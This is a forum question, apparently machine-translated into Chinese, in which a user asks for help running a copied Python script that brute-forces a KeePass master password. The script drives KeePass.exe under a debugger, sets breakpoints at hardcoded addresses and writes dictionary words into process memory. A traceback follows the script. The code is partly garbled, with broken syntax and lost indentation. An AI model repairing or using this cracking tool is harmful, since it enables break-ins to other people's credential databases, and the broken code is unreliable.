我一直尝试运行以下脚本作为尝试恢复KeePassX密码,问题是每次我尝试运行它时都会出现很多编程问题,因为我有时候不是程序员(即使经过研究),很难找到错误的东西......
我非常感谢您成功运行此脚本的任何帮助:
from winappdbg import Debug
from time import strftime
import time
import os.path
counter=0
word=""
words=[]
r_eax=0
r_ecx=0
r_edx=0
WORD_SIZE = 20
#Save the state of the registers
def action_0(event):
global r_eax, r_ecx, r_rdx
aThread = event.get_thread()
r_eax = aThread.get_register("Eax")
r_ecx = aThread.get_register("Ecx")
r_edx = aThread.get_register("Edx")
#Write the word
def action_1( event ):
global word
global words
global counter
global WORD_SIZE
aThread = event.get_thread()
aProcess = event.get_process()
memDir = aThread.get_register("Ecx")
word=words[counter]
word = word.replace("\n","")
word = word[0:WORD_SIZE-1]
#word = word.lower() #optional
aProcess.poke(memDir,word + "\0")
#Check the flag state
def action_2( event ):
global word
global counter
aThread = event.get_thread()
b = aThread.get_flag_value(aThread.Flags.Zero)
if b:
print 'Counter: ' + repr(counter) + ' - Correct: ' + word
event.get_process().kill()
else:
print 'Counter: ' + repr(counter) + ' - Incorrect: ' + word
if counter<:
len(words)-1
counter+=1
aThread.set_register("Eip", 0x004D6699)
else:
event.get_process().kill()
#Restore the registers to the original state
def action_3( event ):
aThread = event.get_thread()
aThread.set_register("Eax",r_eax)
aThread.set_register("Ecx",r_ecx)
aThread.set_register("Edx",r_edx)
aThread.set_register("Eip", 0x004DC395)
#Specify a dictionary here
words = open('dic.txt', "r").readlines()
print "[+] Words Loaded: ",len(words)
#Specify a key file
keyfile = "key"
try:
debug = Debug()
if os.path.isfile(keyfile):
print "[+] Keyfile Loaded: '" + keyfile + "'"
aProcess = debug.execv(['KeePass.exe', 'keepassdb.kdb', '-keyfile:' + keyfile, '-pw:'.ljust(WORD_SIZE+4)])
else:
print "[+] Specified keyfile '" + keyfile + "' does not exist, ignoring argument"
aProcess = debug.execv( ['KeePass.exe', 'keepassdb.kdb', '-pw:'.ljust(WORD_SIZE+4)])
#Set the breakpoints
debug.break_at(aProcess.get_pid() , 0x004DC395, action_0)
debug.break_at(aProcess.get_pid() , 0x004D77A0, action_1)
debug.break_at(aProcess.get_pid() , 0x004D6684, action_2)
debug.break_at(aProcess.get_pid() , 0x004DC39A, action_3)
#Wait for the debugee to finish
t1 = time.clock()
debug.loop()
finally:
debug.stop()
print 'Finished in ' + repr(time.clock() - t1) + ' seconds!'
运行脚本时我得到:
C:\Python27>python.exe force.py
[+] Words Loaded: 5
[+] Keyfile Loaded: 'key'
Traceback (most recent call last):
File "force.py", line 86, in <module>
aProcess = debug.execv(['KeePass.exe', 'keepassdb.kdb', '-keyfile:' + keyfile
, '-pw:'.ljust(WORD_SIZE+4)])
File "C:\Python27\lib\site-packages\winappdbg\debug.py", line 317, in execv
dwParentProcessId = dwParentProcessId)
File "C:\Python27\lib\site-packages\winappdbg\debug.py", line 371, in execl
dwParentProcessId = dwParentProcessId,
File "C:\Python27\lib\site-packages\winappdbg\system.py", line 1259, in start_
process
lpStartupInfo = lpStartupInfo)
File "C:\Python27\lib\site-packages\winappdbg\win32\defines.py", line 164, in
__call__
return self.fn_ansi(*argv, **argd)
File "C:\Python27\lib\site-packages\winappdbg\win32\kernel32.py", line 2630, i
n CreateProcessA
_CreateProcessA(lpApplicationName, lpCommandLine, lpProcessAttributes, lpThr
eadAttributes, bool(bInheritHandles), dwCreationFlags, lpEnvironment, lpCurrentD
irectory, ctypes.byref(lpStartupInfo), ctypes.byref(lpProcessInformation))
File "C:\Python27\lib\site-packages\winappdbg\win32\defines.py", line 120, in
RaiseIfZero
raise ctypes.WinError()
WindowsError: [Error 2] O sistema nÒo pode encontrar o arquivo especificado. >>> which means file not found in portuguese.
注意:该脚本是从http://blog.q-protex.com/2010/03/14/keepass-self-bruteforce/
复制的提前致谢!